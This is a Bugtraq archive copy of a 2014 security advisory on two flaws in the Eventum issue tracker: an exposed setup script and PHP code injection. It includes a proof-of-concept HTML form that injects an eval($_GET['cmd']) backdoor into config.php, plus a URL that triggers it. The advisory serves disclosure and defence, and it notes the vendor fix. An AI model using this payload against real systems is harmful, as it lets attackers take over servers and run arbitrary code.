[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Multiple Vulnerabilities in Eventum
From: High-Tech Bridge Security Research <advisory () htbridge ! com>
Date: 2014-01-27 13:40:20
Message-ID: 20140127134020.DE0772C587EA () htbridge ! ch
[Download RAW message or body]
Advisory ID: HTB23198
Product: Eventum
Vendor: Eventum Development Team
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Advisory Publication: January 22, 2014 [without technical details]
Vendor Notification: January 22, 2014
Vendor Patch: January 24, 2014
Public Disclosure: January 27, 2014
Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94]
CVE References: CVE-2014-1631, CVE-2014-1632
Risk Level: Critical
CVSSv2 Base Scores: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P), 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( \
https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Eventum, which can \
be exploited to reinstall and compromise vulnerable application.
1) Incorrect Default Permissions in Eventum: CVE-2014-1631
The vulnerability exists due to incorrect default permission set for installation \
scripts. Access to installation script located at "/setup/index.php" is not \
restricted by default and the script is not deleted during the installation process. \
A remote attacker can access the script and reinstall vulnerable application.
The installation script can be access by a remote unauthenticated user via the \
following URL:
http://[host]/setup/index.php
2) Code Injection in Eventum: CVE-2014-1632
The vulnerability exists due to insufficient sanitization of the HTTP POST parameter \
"hostname" in "/config/config.php" script during the installation process. A remote \
attacker can inject and execute arbitrary PHP code on the target system with \
privileges of the webserver. Successful exploitation requires access to application's \
database, which can be achieved by providing address of attacker-controlled MySQL \
server.
The following exploitation example injects a backdoor into "/config/config.php" file:
<form action="http://[host]/setup/index.php" method="post" name="main">
<input type="hidden" name="cat" value="install">
<input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
<input type="hidden" name="relative" value="/">
<input type="hidden" name="db_hostname" value="db_hostname">
<input type="hidden" name="db_name" value="db_name">
<input type="hidden" name="db_table_prefix" value="db_table_prefix">
<input type="hidden" name="drop_tables" value="yes">
<input type="hidden" name="db_username" value="db_username">
<input type="hidden" name="setup[smtp][from]" value="email@email.com">
<input type="hidden" name="setup[smtp][host]" value="localhost">
<input type="hidden" name="setup[smtp][port]" value="25">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>
After successful reinstallation an attacker can execute arbitrary PHP code on the \
system. The following example executes the "phpinfo()" PHP function on the vulnerable \
system:
http://[host]/index.php?cmd=phpinfo%28%29;
-----------------------------------------------------------------------------------------------
Solution:
Update to Eventum 2.3.5
More Information:
https://bugs.launchpad.net/eventum/+bug/1271499
Vendor disclosed vulnerabilities and authorized us to release advisory on public \
before our usual delay (3 weeks).
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23198 - https://www.htbridge.com/advisory/HTB23198 - \
Multiple Vulnerabilities in Eventum. [2] Eventum - https://launchpad.net/eventum - \
Eventum is a user-friendly and flexible issue tracking system that can be used by a \
support department to track incoming technical support requests, or by a software \
development team to quickly organize tasks and bugs. [3] Common Vulnerabilities and \
Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public \
use, CVE ® is a dictionary of publicly known information security vulnerabilities and \
exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to \
developers and security practitioners, CWE is a formal list of software weakness \
types. [5] ImmuniWeb ® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's \
proprietary web application security assessment solution with SaaS delivery model \
that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without \
any warranty of any kind. Details of this Advisory may be updated in order to provide \
as accurate information as possible. The latest version of the Advisory is available \
on web page [1] in the References.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic